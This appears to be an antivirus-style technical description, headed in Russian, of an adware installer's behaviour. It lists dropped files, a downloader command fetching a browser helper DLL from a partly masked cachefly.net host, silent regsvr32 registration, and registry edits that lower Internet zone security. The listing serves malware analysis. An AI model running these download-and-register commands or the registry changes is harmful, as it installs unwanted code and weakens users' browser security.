Техническая информация
- %PROGRAM_FILES%\OApps\VFDInstall.exe
- %PROGRAM_FILES%\OApps\dler.exe -url "http://ob#####fy.cachefly.net/bho_get/adk/bho_project.dll" -file "%PROGRAM_FILES%\OApps\bho_project.dll"
- %TEMP%\nsf2.tmp\ns3.tmp "%PROGRAM_FILES%\OApps\dler.exe" -url "http://ob#####fy.cachefly.net/bho_get/adk/bho_project.dll" -file "%PROGRAM_FILES%\OApps\bho_project.dll"
- <SYSTEM32>\regsvr32.exe /s "bho_project.dll"
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] '1609' = '00000000'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] '1609' = '00000000'
- %PROGRAM_FILES%\OApps\bho_project.dll
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\bho_project[1].dll
- %PROGRAM_FILES%\OApps\vfd-adk_uninstall.exe
- %PROGRAM_FILES%\OApps\VFDInstall.exe
- %TEMP%\nsf2.tmp\System.dll
- %TEMP%\nsw5.tmp\inetc.dll
- %PROGRAM_FILES%\OApps\dler.exe
- %TEMP%\nsf2.tmp\fct.dll
- %PROGRAM_FILES%\OApps\config.ini
- %TEMP%\nsf2.tmp\ns3.tmp
- %TEMP%\nsf2.tmp\nsExec.dll
- %TEMP%\nsf2.tmp\fct.dll
- %TEMP%\nsf2.tmp\nsExec.dll
- %TEMP%\nsf2.tmp\System.dll
- %TEMP%\nsw5.tmp\inetc.dll
- %TEMP%\nsf2.tmp\ns3.tmp
- %PROGRAM_FILES%\OApps\VFDInstall.exe
- 'ob#####fy.cachefly.net':80
- ob#####fy.cachefly.net/bho_get/adk/bho_project.dll
- DNS ASK ob#####fy.cachefly.net
- ClassName: 'Shell_TrayWnd' WindowName: ''